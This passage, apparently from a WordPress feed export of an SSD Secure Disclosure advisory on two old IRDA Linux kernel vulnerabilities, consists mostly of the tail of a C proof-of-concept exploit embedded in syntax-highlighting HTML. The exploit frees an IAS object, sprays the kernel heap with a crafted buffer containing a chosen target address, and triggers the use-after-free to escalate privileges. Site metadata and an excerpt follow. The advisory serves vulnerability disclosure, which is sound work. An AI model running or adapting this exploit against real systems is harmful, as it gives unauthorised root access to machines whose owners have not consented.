class=\"crayon-e\">irda_bind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4c<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;c&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-260\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">irda_bind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4a<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;c&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-261\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-262\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-263\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-264\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-c\">\/* 0x00 means that it takes self-&gt;ias_obj *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-265\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">irda_set_ias<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd2<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;x00&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-266\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">irda_set_ias<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;x00&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-267\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-268\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-269\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-270\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-271\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-272\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd3<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-273\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-274\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/* annoying the queue and free the first queued object*\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-275\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[+] Freeing the first queued ias object n&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-276\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-277\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-278\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-279\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/\/getchar();<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-280\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-281\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">unsigned<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">malloc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">4096<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-282\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">pid_t <\/span><span class=\"crayon-v\">pid<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-283\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">u_int64_t <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff81f01500<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-284\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff81efeb60<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-285\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/\/addr = 0xdeadbeef;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-286\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target_addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-287\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-288\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xcc<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">88<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-289\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-290\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-291\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[+] Spray memory and take control of the old freed objectn&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-292\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">spray_heap<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">88<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-293\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">usleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">10000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-294\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-295\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[+] Allocating new object to overwrite the targetted pointern&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-296\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">irda_bind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x30<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;c&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-297\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[+] Freeing object again n&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-298\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd4<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-299\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-300\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[+] Fill the last object with payload n&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-301\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xcc<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">88<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-302\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">spray_heap<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">88<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-303\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-304\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">usleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-305\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-306\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-307\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-308\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-309\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">argc<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-310\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-311\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">unsigned<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">long<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target_addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-312\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">pid_t <\/span><span class=\"crayon-v\">pid<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-313\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-314\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">argc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-315\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-r\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;%s &lt;target object&gt;n&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-316\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-317\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-318\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">sscanf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;%lx&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">target_addr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-319\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-320\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">uaf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target_addr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-321\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-322\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">trigger<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-323\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0482 seconds] -->  <\/p>\n<p>If you want to look at a Presentation with detailed graphical explanation about the vulnerabilities go to:<br \/> <a href=\"https:\/\/cdn2.hubspot.net\/hubfs\/2518562\/beVX\/bevx-Dissecting-a-17-year-old-Vitaly-Nikolenko.pdf?t=1537941151847\">beVX &#8211; Dissecting a 17 year old (Vitaly Nikolenko)<\/a><\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3759\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Thu, 27 Sep 2018 11:23:40 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describes two vulnerabilities in the Linux Kernel. By combining these two vulnerabilities a privilege escalation can be achieved. The two vulnerabilities are quite old and have been around for at least 17 years, quite a few Long Term releases of Linux have them in their kernel. While the assessment of &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3759\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 IRDA Linux Driver UAF<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11946,10757,13145],"class_list":["post-13461","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-privilege-escalation","tag-securiteam-secure-disclosure","tag-use-after-free"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13461","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=13461"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13461\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=13461"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=13461"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=13461"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}